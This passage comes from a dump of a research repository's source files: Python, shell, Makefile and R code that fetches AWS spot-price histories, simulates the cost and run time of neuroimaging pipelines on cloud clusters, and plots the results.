lengths\n reg_len = len(regions)\n ip_len = len(instance_products)\n\n # For each AWS region\n for reg_idx, region in enumerate(regions):\n # For each instance_type-product combination\n for ip_idx, (instance_type, product) in enumerate(instance_products):\n proc = Process(target=get_df_and_save,\n args=(None, instance_type, product, region, out_dir))\n proc_list.append(proc)\n\n # Run in parallel\n utils.run_in_parallel(proc_list, num_cores)\n\n # Gather files to merge into one dataframe\n sh_log.info('Done fetching and saving histories.\\nGathering for merge...')\n for root, 
dirs, files in os.walk(out_dir):\n if files:\n found_csvs = [os.path.join(root, f) for f in files \\\n if f.endswith('csv')]\n out_csvs.extend(found_csvs)\n\n # Create data frame list\n for csv in out_csvs:\n df_list.append(pd.DataFrame.from_csv(csv))\n\n # Merge dataframes\n sh_log.info('Merging dataframe list...')\n big_df = pd.concat(df_list, ignore_index=True)\n\n # Save to disk\n big_csv = os.path.join(out_dir, 'spot_history_%s.csv' % log_month)\n sh_log.info('Saving data frame to disk as %s' % big_csv)\n big_df.to_csv(big_csv)\n\n\n# Make script executable\nif __name__ == '__main__':\n\n # Import packages\n import argparse\n\n # Init argparser\n parser = argparse.ArgumentParser(description=__doc__)\n\n # Required arguments\n parser.add_argument('-o', '--out_dir', nargs=1, required=True,\n type=str, help='Base directory to store spot '\\\n 'history data frames')\n parser.add_argument('-n', '--num_cores', nargs=1, required=True,\n type=int, help='Number of cores to run in parallel')\n\n # Parse arguments\n args = parser.parse_args()\n\n # Init variables\n out_dir = args.out_dir[0]\n num_cores = args.num_cores[0]\n\n # Run main routine\n main(out_dir, num_cores)\n" }, { "alpha_fraction": 0.6106666922569275, "alphanum_fraction": 0.6213333606719971, "avg_line_length": 25.785715103149414, "blob_id": "e1cdb32296089e8f7bf7f87e2e479a3b7395e43f", "content_id": "a6c535633d2e84b9ff0ad7412395c039e73c63ed", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 375, "license_type": "permissive", "max_line_length": 65, "num_lines": 14, "path": "/data-preproc/scripts/download_run_fs.sge", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "#! /bin/bash\n#$ -cwd\n#$ -S /bin/bash\n#$ -V\n#$ -t 1-50\n#$ -q all.q\n#$ -pe mpi_smp 4\n#$ -e /home/ubuntu/fs_run.err\n#$ -o /home/ubuntu/fs_run.out\nsource /etc/profile.d/cpac_env.sh\necho \"Start - TASKID \" $SGE_TASK_ID \" : \" $(date)\nexport SUBJECTS_DIR=/mnt/subjects\npython /home/ubuntu/work-dir/download_run_fs.py $SGE_TASK_ID /mnt\necho \"End - TASKID \" $SGE_TASK_ID \" : \" $(date)\n" }, { "alpha_fraction": 0.6076555252075195, "alphanum_fraction": 0.6650717854499817, "avg_line_length": 25.125, "blob_id": "da38bd2001e0059f1aff48a30c32698e3fce59cf", "content_id": "1fc67a3f206b759199857a554ba6c99e059ca603", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 209, "license_type": "permissive", "max_line_length": 77, "num_lines": 8, "path": "/poster/Makefile", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "Clark_AWS_OHBM2015.pdf: Clark_AWS_OHBM2015.tex Makefile beamerthemeCMINKI.sty\n\techo \"$< $@\"\n#\tlatex $< \n\tpdflatex $(basename $<) $@\n#\trm $(basename $<).dvi\n\trm $(basename $<).log\n\nall: Clark_AWS_OHBM2015.pdf\n" }, { "alpha_fraction": 0.5823907852172852, "alphanum_fraction": 0.5880122184753418, "avg_line_length": 29.318275451660156, "blob_id": "7ceab7ae51385fcd44a8c9517ed72e1755469286", "content_id": "bc642ac92a6967c6dca7d43febd9118665d1409d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14765, "license_type": "permissive", "max_line_length": 113, "num_lines": 487, "path": "/spot-model/utils.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# spot-model/utils.py\n#\n# Author: Daniel Clark, 2015\n\n'''\nThis module 
contains various utilities for the modules and scripts in\nthis folder or package\n'''\n\n# Apply simulation dataframe\ndef apply_cost_model(sim_df_row):\n '''\n Apply cost model to the simulation results dataframe by row\n\n Parameters\n ----------\n sim_df_row : pandas.Series\n dataframe row from AWS simulation result dataframe\n\n Returns\n -------\n stat_series : pandas.Series\n dataframe series with the configuration, simulation run, and\n costs\n '''\n\n # Import packages\n import numpy as np\n import pandas as pd\n from spot_price_model import calc_s3_model_costs\n\n # Init variables\n run_time = sim_df_row['compute_time']\n wait_time = sim_df_row['wait_time']\n node_cost = sim_df_row['per_node_cost']\n first_iter_time = sim_df_row['first_iter_time']\n num_jobs = sim_df_row['num_datasets']\n jobs_per = sim_df_row['jobs_per_node']\n num_nodes = min(np.ceil(float(num_jobs)/jobs_per), 20)\n av_zone = sim_df_row['av_zone']\n in_gb = sim_df_row['in_gb']\n out_gb = sim_df_row['out_gb']\n up_rate = sim_df_row['up_rate']\n down_rate = sim_df_row['down_rate']\n\n # Grab costs from s3 model\n total_cost, instance_cost, ebs_storage_cost, s3_cost, \\\n s3_storage_cost, s3_req_cost, s3_xfer_cost, \\\n total_time, run_time, wait_time, \\\n xfer_up_time, s3_upl_time, s3_download_time = \\\n calc_s3_model_costs(run_time, wait_time, node_cost, first_iter_time,\n num_jobs, num_nodes, jobs_per, av_zone,\n in_gb, out_gb, up_rate, down_rate)\n\n # Create dictionary\n stat_dict = {'start_time' : sim_df_row['start_time'],\n 'proc_time' : sim_df_row['proc_time'],\n 'num_datasets' : num_jobs,\n 'jobs_per_node' : jobs_per,\n 'num_jobs_iter' : sim_df_row['num_jobs_iter'],\n 'bid_ratio' : sim_df_row['bid_ratio'],\n 'bid_price' : sim_df_row['bid_price'],\n 'median_history' : sim_df_row['median_history'],\n 'mean_history' : sim_df_row['mean_history'],\n 'stdev_history' : sim_df_row['stdev_history'],\n 'run_time' : run_time,\n 'wait_time' : wait_time,\n 'per_node_cost' : node_cost,\n 'num_interrupts' : sim_df_row['num_interrupts'],\n 'first_iter_time' : first_iter_time,\n 'num_nodes' : num_nodes,\n 'av_zone' : av_zone,\n 'in_gb' : in_gb,\n 'up_rate' : up_rate,\n 'down_rate' : down_rate,\n # S3 model costs\n 'total_cost' : total_cost,\n 'instance_cost' : instance_cost,\n 'ebs_storage_cost' : ebs_storage_cost,\n 's3_cost' : s3_cost,\n 's3_storage_cost' : s3_storage_cost,\n 's3_req_cost' : s3_req_cost,\n 's3_xfer_cost' : s3_xfer_cost,\n 'total_time' : total_time,\n 'xfer_up_time' : xfer_up_time,\n 's3_upl_time' : s3_upl_time,\n 's3_download_time' : s3_download_time}\n\n # Convert dict to pandas Series\n stat_series = pd.Series(stat_dict)\n\n # Return new dataframe row\n return stat_series\n\n\n# Add comfig columns to simulation dataframe\ndef add_config_columns(sim_df_csv, cfg_yaml, out_dir):\n '''\n Function to add AWS simulation configuration parameters to the\n simulation dataframe csv generated by the spot_price_model.main()\n function.\n\n Parameters\n ----------\n sim_df_csv : string\n filepath to the siulation dataframe csv; this should be in the\n availability zone folder it was simulated under\n cfg_yaml : string\n filepath to the AWS simulation configuration yaml file that was\n used to launch the simulation\n out_dir : string\n filepath to the base output directory to store the modified\n dataframe\n\n Returns\n -------\n new_df : pandas.DataFrame object\n the updated dataframe\n '''\n\n # Import packages\n import os\n import pandas as pd\n import yaml\n\n # Init variables\n sim_df_csv = 
os.path.abspath(sim_df_csv)\n av_zone = os.path.dirname(sim_df_csv).split('/')[-1]\n sim_cfg = yaml.load(open(cfg_yaml, 'r'))\n\n # Grab values from config\n in_gb = sim_cfg['in_gb']\n out_gb = sim_cfg['out_gb']\n out_gb_dl = sim_cfg['out_gb_dl']\n up_rate = sim_cfg['up_rate']\n down_rate = sim_cfg['down_rate']\n\n # Load in dataframe\n new_df = pd.DataFrame.from_csv(sim_df_csv)\n\n # Populate new columns\n new_df['av_zone'] = av_zone\n new_df['in_gb'] = in_gb\n new_df['out_gb'] = out_gb\n new_df['out_gb_dl'] = out_gb_dl\n new_df['up_rate'] = up_rate\n new_df['down_rate'] = down_rate\n\n # Save dataframe\n out_csv_dir = os.path.join(out_dir, av_zone)\n if not os.path.exists(out_csv_dir):\n try:\n os.makedirs(out_csv_dir)\n except Exception as err:\n print err\n\n new_df.to_csv(os.path.join(out_csv_dir, os.path.basename(sim_df_csv)))\n\n # Return new dataframe\n return new_df\n\n\n# Build data frame\ndef build_big_df(av_zone_dir):\n '''\n Function to parse and merge the simulation results from the\n *_sim and *_stats files into one big data frame based on the\n availability zone directory provided; it saves this to a csv\n\n Parameters\n ----------\n av_zone_dir : string\n file path to the directory containing the simulation results\n\n Returns\n -------\n big_df : pandas.DatFrame object\n a merged dataframe with all of the stats for the simulation\n '''\n\n # Import packages\n from spot_price_model import spothistory_from_dataframe\n import glob\n import numpy as np\n import os\n import pandas as pd\n\n # Init variables\n df_list = []\n av_zone = av_zone_dir.split('/')[-1]\n csvs = glob.glob(os.path.join(av_zone_dir, '*_stats.csv'))\n\n # Print av zone of interest being created\n print av_zone\n spot_history = spothistory_from_dataframe('spot_history/merged_dfs.csv', 'c3.8xlarge', 'Linux/UNIX', av_zone)\n\n # Iterate through csvs\n for stat_csv in csvs:\n # Get pattern to find sim dataframe\n csv_pattern = stat_csv.split('_stats.csv')[0]\n sim_csv = csv_pattern + '_sim.csv'\n stat_df = pd.DataFrame.from_csv(stat_csv)\n sim_df = pd.DataFrame.from_csv(sim_csv)\n\n # Extract params from filename\n fp_split = csv_pattern.split('-jobs')\n bid_ratio = float(fp_split[1][1:].split('-bid')[0])\n bid_price = bid_ratio*spot_history.mean()\n\n ### Download time fix ###\n # *Note the CPAC, ANTs, and Freesurfer csv outputs need this\n # CPAC pipeline params\n jobs_per = 3\n down_rate = 20\n out_gb_dl = 2.3\n down_gb_per_sec = down_rate/8.0/1024.0\n # Variables for download time fix\n num_ds = int(fp_split[0].split('/')[-1].split('_')[-1])\n num_nodes = min(np.ceil(float(num_ds)/jobs_per), 20)\n num_iter = np.ceil(num_ds/float((jobs_per*num_nodes)))\n num_jobs_n1 = ((num_iter-1)*num_nodes*jobs_per)\n res_xfer_out = (num_ds-num_jobs_n1)*(out_gb_dl/down_gb_per_sec)\n # Fix download time\n #stat_df['Download time'] += res_xfer_out/60.0 \n\n # Add to stat df\n len_df = len(stat_df)\n stat_df['Sim index'] = sim_df.index\n stat_df['Av zone'] = pd.Series([av_zone]*len_df, index=stat_df.index)\n stat_df['Bid ratio'] = pd.Series([bid_ratio]*len_df, index=stat_df.index)\n stat_df['Bid price'] = pd.Series([bid_price]*len_df, index=stat_df.index)\n stat_df['Num datasets'] = pd.Series([num_ds]*len_df, index=stat_df.index)\n stat_df['Start time'] = sim_df['Start time']\n stat_df['Interrupts'] = sim_df['Interrupts']\n stat_df['First Iter Time'] = sim_df['First Iter Time']\n\n # Add to dataframe list\n df_list.append(stat_df)\n\n # Status update\n print 'done making df list, now concat to big df...'\n big_df = 
pd.concat(df_list, ignore_index=True)\n\n # Write to disk as csv\n print 'Saving to disk...'\n big_df.to_csv('./%s.csv' % av_zone)\n print 'done writing!'\n\n # Return dataframe\n return big_df\n\n\n# Build list of processes to use in multi-proc\ndef build_proc_list(zones_basedir):\n '''\n Function to build a list of build_big_df processes from a directory\n of availability zones folders\n\n Parameters\n ----------\n zones_basedir : string\n base directory where the availability zone folders are residing\n\n Returns\n -------\n proc_list : list\n a list of multiprocessing.Process objects to run the\n build_big_df function\n '''\n\n # Import packages\n import glob\n import os\n import pandas as pd\n from multiprocessing import Process\n\n # Init variables\n av_zone_fp = os.path.join(zones_basedir, '*')\n av_zones_dirs = glob.glob(av_zone_fp)\n\n # Build big dictionary\n proc_list = [Process(target=build_big_df, args=(av_zone_dir,)) \\\n for av_zone_dir in av_zones_dirs]\n\n # Return the process list\n return proc_list\n\n\n# Convert spot history list to dataframe csv\ndef pklz_to_df(out_dir, pklz_file):\n '''\n Function to convert pklz list file to csv dataframe\n\n Parameters\n ----------\n out_dir : string\n filepath to the output base directory to store the dataframes\n pklz_file : string\n filepath to the .pklz file, which contains a list of\n boto spot price history objects\n\n Returns\n -------\n None\n this function saves the dataframe to a csv\n '''\n\n # Import packages\n import gzip\n import os\n import pandas as pd\n import pickle as pk\n import time\n\n # Init variables\n gfile = gzip.open(pklz_file)\n sh_list = pk.load(gfile)\n idx = 0\n\n # If the list is empty return nothing\n if len(sh_list) == 0:\n return\n\n # Init data frame\n df_cols = ['Timestamp', 'Price', 'Region', 'Availability zone',\n 'Product', 'Instance type']\n merged_df = pd.DataFrame(columns=df_cols)\n\n # Iterate through histories\n for sh in sh_list:\n timestamp = str(sh.timestamp)\n price = sh.price\n reg = str(sh.region).split(':')[-1]\n av_zone = str(sh.availability_zone)\n prod = str(sh.product_description)\n inst = str(sh.instance_type)\n df_entry = [timestamp, price, reg, av_zone, prod, inst]\n merged_df.loc[idx] = df_entry\n idx += 1\n print '%d/%d' % (idx, len(sh_list))\n\n # Write out merged dataframe\n out_csv = os.path.join(out_dir, reg, prod.replace('/', '-'), inst, str(time.time()) + '.csv')\n csv_dir = os.path.dirname(out_csv)\n\n # Check if folders exists\n if not os.path.exists(csv_dir):\n os.makedirs(csv_dir)\n\n print 'Done merging, writing out to %s...' 
% out_csv\n merged_df.to_csv(out_csv)\n\n\n# Run jobs in parallel\ndef run_in_parallel(proc_list, num_cores):\n '''\n Function to kick off a list of processes in parallel, guaranteeing\n that a fixed number of cores or less is running at all times\n\n Parameters\n ----------\n proc_list : list\n a list of multiprocessing.Process objects\n num_cores : integer\n the number of cores or processes to run at once\n\n Returns\n -------\n None\n there is no return value for this function\n '''\n\n # Import packages\n import time\n\n # Init variables\n idx = 0\n job_queue = []\n\n # While loop for when jobs are still running\n while idx < len(proc_list):\n if len(job_queue) == 0 and idx == 0:\n idc = idx\n for p in proc_list[idc:idc+num_cores]:\n p.start()\n job_queue.append(p)\n idx += 1\n else:\n for job in job_queue:\n if not job.is_alive():\n print 'found dead job', job\n loc = job_queue.index(job)\n del job_queue[loc]\n if idx < len(proc_list):\n proc_list[idx].start()\n else:\n break\n job_queue.append(proc_list[idx])\n idx += 1\n time.sleep(2)\n\n\n# Print status of file progression in loop\ndef print_loop_status(itr, full_len):\n '''\n Function to print the current percentage completed of a loop\n Parameters\n ----------\n itr : integer\n the current iteration of the loop\n full_len : integer\n the full length of the loop\n Returns\n -------\n None\n the function prints the loop status, but doesn't return a value\n '''\n\n # Print the percentage complete\n per = 100*(float(itr)/full_len)\n print '%d/%d\\n%f%% complete' % (itr, full_len, per)\n\n\n# Setup log file\ndef setup_logger(logger_name, log_file, level, to_screen=False):\n '''\n Function to initialize and configure a logger that can write to file\n and (optionally) the screen.\n\n Parameters\n ----------\n logger_name : string\n name of the logger\n log_file : string\n file path to the log file on disk\n level : integer\n indicates the level at which the logger should log; this is\n controlled by integers that come with the python logging\n package. (e.g. 
logging.INFO=20, logging.DEBUG=10)\n to_screen : boolean (optional)\n flag to indicate whether to enable logging to the screen\n\n Returns\n -------\n logger : logging.Logger object\n Python logging.Logger object which is capable of logging run-\n time information about the program to file and/or screen\n '''\n\n # Import packages\n import logging\n\n # Init logger, formatter, filehandler, streamhandler\n logger = logging.getLogger(logger_name)\n logger.setLevel(level)\n formatter = logging.Formatter('%(asctime)s : %(message)s')\n\n # Write logs to file\n file_handler = logging.FileHandler(log_file)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n # Write to screen, if desired\n if to_screen:\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(formatter)\n logger.addHandler(stream_handler)\n\n # Return the logger\n return logger\n\n\n# Make executable\nif __name__ == '__main__':\n\n # Import packages\n import sys\n\n # Grab az_zone folders base\n zones_basedir = str(sys.argv[1])\n\n # Call main\n proc_list = build_proc_list(zones_basedir)\n\n #build_big_df('~/Documents/projects/Clark2015_AWS/spot-model/out/us-east-1a')\n # Run in parallel\n run_in_parallel(proc_list, 6)\n" }, { "alpha_fraction": 0.5949280261993408, "alphanum_fraction": 0.602695882320404, "avg_line_length": 28.18000030517578, "blob_id": "453e77c734b8924bb962c8febdbe7d2a0ee4f2c7", "content_id": "b96bb3d63ecfef1b82a208a4316b9b926d596bee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4377, "license_type": "permissive", "max_line_length": 88, "num_lines": 150, "path": "/data-preproc/scripts/get_run_stats.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# get_run_stats.py\n#\n# Author: Daniel Clark, 2015\n\n'''\nThis module contains functions which interact with log files on S3 to\ngather runtime statistics\n'''\n\n# Get CPAC runtimes from log file\ndef get_cpac_runtimes(log_str):\n '''\n '''\n\n # Import packages\n import dateutil.parser\n import pytz\n\n # Init variables\n for log_line in log_str:\n if 'End - ' in log_line:\n end_line = log_line\n elif 'Elapsed run time' in log_line:\n cpac_time_line = log_line\n elif 'time of completion' in log_line:\n upl_start_line = log_line\n elif 'finished file' in log_line:\n num_files = int(log_line.split('/')[-1])\n elif 'detailed dot file' in log_line:\n subj_id = log_line.split(': ')[1].split('resting_preproc_')[1].split('/')[0]\n\n\n # Get CPAC runtime\n cpac_time = float(cpac_time_line.split(': ')[-1])\n\n # Get upload start time\n upl_start_time = upl_start_line.split(': ')[-1]\n upl_start_dt = dateutil.parser.parse(upl_start_time)\n upl_start_dt = pytz.utc.localize(upl_start_dt)\n\n # Get upload finish time\n upl_finish_time = end_line.split(' : ')[-1]\n upl_finish_dt = dateutil.parser.parse(upl_finish_time)\n\n # Get upload time\n upl_time = (upl_finish_dt - upl_start_dt).total_seconds()/60.0\n\n # Return variables\n return cpac_time, upl_time, num_files, subj_id\n\n\n# Get CPAC runtimes from SGE logs\ndef cpac_sge_logstats(s3_prefix, str_filt, creds_path, bucket_name):\n '''\n '''\n\n # Import packages\n from CPAC.AWS import fetch_creds, aws_utils\n import os\n import numpy as np\n import yaml\n\n # Init variables\n bucket = fetch_creds.return_bucket(creds_path, bucket_name)\n log_keys = []\n log_pass = {}\n log_fail = []\n\n # Get the log file keys\n print 'Finding log S3 keys...'\n for key in 
bucket.list(prefix=s3_prefix):\n if str_filt in str(key.name):\n log_keys.append(key)\n\n # Get only tasks that finished\n print 'Searching for complete CPAC runs and getting runtimes...'\n for idx, key in enumerate(log_keys):\n kname = str(key.name)\n # Get log contents as a string in memory\n log_str = key.get_contents_as_string()\n\n # If it passed cpac running without crashing\n if 'CPAC run complete' in log_str:\n cpac_pass = True\n else:\n cpac_pass = False\n\n # Split log strings into list\n log_str = log_str.split('\\n')\n\n # If it has 'End' at the end, it ran without crashing\n if 'End' in log_str[-2] and cpac_pass:\n # Get runtimes\n cpac_time, upl_time, num_files, subj = get_cpac_runtimes(log_str)\n log_pass[subj] = (cpac_time, upl_time, num_files)\n else:\n log_fail.append(kname)\n\n # Update status\n print '%.3f%% complete' % (100*(float(idx)/len(log_keys)))\n\n # Get stats\n num_subs_pass = len(log_pass)\n num_subs_fail = len(log_fail)\n\n cpac_times = {sub : times[0] for sub, times in log_pass.items()}\n cpac_mean = np.mean(cpac_times.values())\n\n upl_times = {sub : times[1] for sub, times in log_pass.items()}\n upl_mean = np.mean(upl_times.values())\n\n # Save times as yamls\n with open(os.path.join(os.getcwd(), 'cpac_times.yml'), 'w') as f:\n f.write(yaml.dump(cpac_times))\n with open(os.path.join(os.getcwd(), 'upl_times.yml'), 'w') as f:\n f.write(yaml.dump(upl_times))\n with open(os.path.join(os.getcwd(), 'fail_logs.yml'), 'w') as f:\n f.write(yaml.dump(log_fail))\n\n # Print report\n print 'Number of subjects passed: %d' % len(log_pass)\n print 'Number of subjects failed: %d' % len(log_fail)\n print 'Average CPAC run time: %.3f minutes' % cpac_mean\n print 'Average upload time: %.3f minutes' % upl_mean\n\n # Return variables\n return cpac_times, upl_times\n\n\n# Histogram of runtimes\ndef plot_runtimes_hist(times_dict, num_bins):\n '''\n '''\n\n # Import packages\n import matplotlib.pyplot as plt\n import numpy as np\n import os\n\n # Init variables\n times = times_dict.values()\n hist, bins = np.histogram(times, bins=num_bins)\n\n # Plot histogram\n width = 0.7 * (bins[1] - bins[0])\n center = (bins[:-1] + bins[1:]) / 2\n plt.bar(center, hist, align='center', width=width)\n\n # Save fig\n plt.savefig(os.path.join(os.getcwd(), 'histogram.png'))\n" }, { "alpha_fraction": 0.6454908847808838, "alphanum_fraction": 0.6632607579231262, "avg_line_length": 36.831932067871094, "blob_id": "55e1788ad64903cd4e17823c661cf44a1412c8e8", "content_id": "8044b1f0a288b02c8c8baa33397d91b478fa8f57", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "RMarkdown", "length_bytes": 4502, "license_type": "permissive", "max_line_length": 178, "num_lines": 119, "path": "/spot-model/spot_sim_plots_sw.Rmd", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "---\ntitle: \"AWSome simulations\"\nauthor: \"cameron and danny\"\ndate: \"07/06/2015\"\noutput: html_document\n---\n\nResults for AWS simulations. Ideal plots are based on a static model in\nwhich the price does not fluctuate over time. Simulation results use \nhistorical spot price information to run monte-carlo simulations to \nestimate how long and how expensive the runs would be if they were\nrun at that point in time. Models are based on the execution of a few\ndifferent processing pipelines:\n\n1. 
The Configurable Pipeline for the Analysis of Connectomes (C-PAC) pipeline, which performs basic structural processing along with functional connectomics-style fMRI processing.\n2. The FreeSurfer pipeline for extracting cortical thickness and other indices of anatomy from structural MRI data.\n\nThe pipelines are executed on an SGE-style cluster with a single master node and up to 20 compute \"worker\" nodes. The master node is a t2.small\non-demand instance with local data storage to support the execution of \nall other nodes. \n\n```{r}\nlibrary(ggplot2)\nlibrary(reshape)\nlibrary(plyr)\n\nif( ! file.exists(\"cpac_df_agg.csv\")){\n  cpac_df = read.csv(\"cpac_df.csv\")\n\n  summary(cpac_df)\n\n  # Median statistics (stored in mean_* columns) by av_zone, num_datasets, and bid_ratio\n  cpac_df_agg<-ddply(cpac_df,.(Av.zone,Num.datasets,Bid.ratio),\n        summarize,\n        mean_total_cost=median(Total.cost),\n        mean_instance_cost=median(Instance.cost),\n        mean_storage_cost=median(Storage.cost),\n        mean_xfer_cost=median(Tranfer.cost),\n        mean_total_time=median(Total.time),\n        mean_run_time=median(Run.time),\n        mean_wait_time=median(Wait.time),\n        mean_upl_time=median(Upload.time),\n        mean_dl_time=median(Download.time),\n        mean_interrupts=median(Interrupts))\n\n\n  # remove the full df\n  rm(cpac_df)\n\n  cpac_df_agg$Region[grep(\"us-west\",cpac_df_agg$Av.zone)]=\"US West\"\n  cpac_df_agg$Region[grep(\"us-east\",cpac_df_agg$Av.zone)]=\"US East\"\n  cpac_df_agg$Region[grep(\"ap\",cpac_df_agg$Av.zone)]=\"Asia Pacific\"\n  cpac_df_agg$Region[grep(\"eu\",cpac_df_agg$Av.zone)]=\"Europe\"\n  cpac_df_agg$Region[grep(\"sa\",cpac_df_agg$Av.zone)]=\"South America\"\n  cpac_df_agg$Region=factor(cpac_df_agg$Region)\n  #cpac_df_agg=subset(cpac_df_agg,Num.datasets<=10000)\n  cpac_df_agg=subset(cpac_df_agg,Num.datasets < 3000)\n  write.csv(cpac_df_agg,file=\"cpac_df_agg.csv\")\n} else {\n  cpac_df_agg=read.csv(\"cpac_df_agg.csv\")\n  cpac_df_agg=subset(cpac_df_agg,Num.datasets < 3000)\n}\n\n\n```\n\nThe aggregated results are then plotted:\n\n```{r plots, fig.width=8, fig.height=12}\nlibrary(gridExtra)\n\np1<-ggplot(subset(cpac_df_agg,Num.datasets==1000), \n           aes(x=Bid.ratio,y=mean_total_cost,col=Av.zone))+\n  geom_line()+\n  facet_grid(Region~.,scales=\"free_y\")+\n  theme_bw()+\n  theme(legend.position=\"None\",\n        axis.title.x = element_text(size=10,colour=\"black\", vjust=-.8),\n        axis.title.y = element_text(size=10,colour=\"black\"),\n        axis.text.x = element_text(size=8,colour=\"black\", angle=35),\n        axis.text.y = element_text(size=8,colour=\"black\"))\n\n\np2<-ggplot(subset(cpac_df_agg,Num.datasets==1000), \n           aes(x=Bid.ratio,y=mean_total_time/3600,col=Av.zone))+\n  geom_line()+\n  facet_grid(Region~.,scales=\"free_y\")+\n  theme(legend.position=\"None\")\n\np3<-ggplot(subset(cpac_df_agg,Bid.ratio==2.5), \n           aes(x=Num.datasets,y=mean_total_cost,col=Av.zone))+\n  geom_line()+\n  facet_grid(Region~.,scales=\"free_y\")+\n  theme(legend.position=\"None\")\n\np4<-ggplot(subset(cpac_df_agg,Bid.ratio==2.5), \n           aes(x=Num.datasets,y=mean_total_time/3600,col=Av.zone))+\n  geom_line()+\n  facet_grid(Region~.,scales=\"free_y\")+\n  theme(legend.position=\"None\")\n\np5<-ggplot(subset(cpac_df_agg,Bid.ratio==2.5), \n           aes(x=Num.datasets,y=mean_interrupts,col=Av.zone))+\n  geom_line()+\n  facet_grid(Region~.,scales=\"free_y\")+\n  theme(legend.position=\"None\")\n\ngrid.newpage()\nlayout=grid.layout(2,2)\npushViewport(viewport(layout=layout))\n\nprint(p1,vp=viewport(layout.pos.row=1, layout.pos.col=1))\nprint(p2,vp=viewport(layout.pos.row=2, layout.pos.col=1))\nprint(p3,vp=viewport(layout.pos.row=1, 
layout.pos.col=2))\nprint(p4,vp=viewport(layout.pos.row=2, layout.pos.col=2))\n```\n\n\nNote that the `echo = FALSE` parameter was added to the code chunk to prevent printing of the R code that generated the plot.\n" }, { "alpha_fraction": 0.6073130369186401, "alphanum_fraction": 0.6353868842124939, "avg_line_length": 32.94411849975586, "blob_id": "b7ea5bad57f99febbbac645e60beb5d7423d0833", "content_id": "f2d59707dbc4af4024bb6e20aee59e16d41badbd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 11541, "license_type": "permissive", "max_line_length": 117, "num_lines": 340, "path": "/spot-model/S3_costs_2mm.R", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "library(ggplot2)\nlibrary(plyr)\nlibrary(reshape)\nlibrary(grid)\n\n# Multiple plot function\n#\n# ggplot objects can be passed in ..., or to plotlist (as a list of ggplot objects)\n# - cols: Number of columns in layout\n# - layout: A matrix specifying the layout. If present, 'cols' is ignored.\n#\n# If the layout is something like matrix(c(1,2,3,3), nrow=2, byrow=TRUE),\n# then plot 1 will go in the upper left, 2 will go in the upper right, and\n# 3 will go all the way across the bottom.\n#\nmultiplot <- function(..., plotlist=NULL, file, cols=1, layout=NULL) {\n require(grid)\n \n # Make a list from the ... arguments and plotlist\n plots <- c(list(...), plotlist)\n \n numPlots = length(plots)\n \n # If layout is NULL, then use 'cols' to determine layout\n if (is.null(layout)) {\n # Make the panel\n # ncol: Number of columns of plots\n # nrow: Number of rows needed, calculated from # of cols\n layout <- matrix(seq(1, cols * ceiling(numPlots/cols)),\n ncol = cols, nrow = ceiling(numPlots/cols))\n }\n \n if (numPlots==1) {\n print(plots[[1]])\n \n } else {\n # Set up the page\n grid.newpage()\n pushViewport(viewport(layout = grid.layout(nrow(layout), ncol(layout))))\n \n # Make each plot, in the correct location\n for (i in 1:numPlots) {\n # Get the i,j matrix positions of the regions that contain this subplot\n matchidx <- as.data.frame(which(layout == i, arr.ind = TRUE))\n \n print(plots[[i]], vp = viewport(layout.pos.row = matchidx$row,\n layout.pos.col = matchidx$col))\n }\n }\n}\n\ncalc_costs_aws_2spot <- function(x){\n num_datasets <- x\n num_months = 48\n\n # constants based on capacity of instances\n # and C-PAC capacity\n datasets_instance <- 3\n hours_dataset <- .75\n\n # costs of head and node instances\n head_cost_hour <- 0.052\n node_cost_hour <- 2*0.26\n\n # storage related costs\n EBS_overhead <- 20\n EBS_GB_dataset <- 4.5\n EBS_GB_month <- 0.1\n hours_month <- 30*24\n num_copies <- 3\n\n\n #xfers\n xfer_cost_BG <- 0.09\n\n\n # calculate the number of instances\n num_instances <- min(c(ceiling(num_datasets/datasets_instance),20))\n\n # calculate the number of hours\n num_iters <- ceiling(num_datasets / (datasets_instance * num_instances))\n num_hours <- ceiling(hours_dataset * num_iters)\n\n total_cost <- num_hours * (head_cost_hour + num_instances * node_cost_hour) +\n num_datasets * EBS_GB_dataset * (num_hours / hours_month) * EBS_GB_month +\n num_datasets * EBS_GB_dataset * xfer_cost_BG\n\n total_cost <- if(is.nan(total_cost)) 0 else ceiling(total_cost)\n #return(c(num_instances,num_iters,num_hours,total_cost))\n #return(total_cost,num_hours)\n return(total_cost)\n}\ncalc_costs_aws_spot <- function(x){\n num_datasets <- x\n num_months = 48\n \n # constants based on capacity of instances\n # and C-PAC capacity\n 
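# (added note: the constants below encode the C-PAC capacity assumptions\n  # used throughout this script -- 3 datasets run per node at a time and\n  # one dataset takes 0.75 hr, i.e. 45 min, to process)\n  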
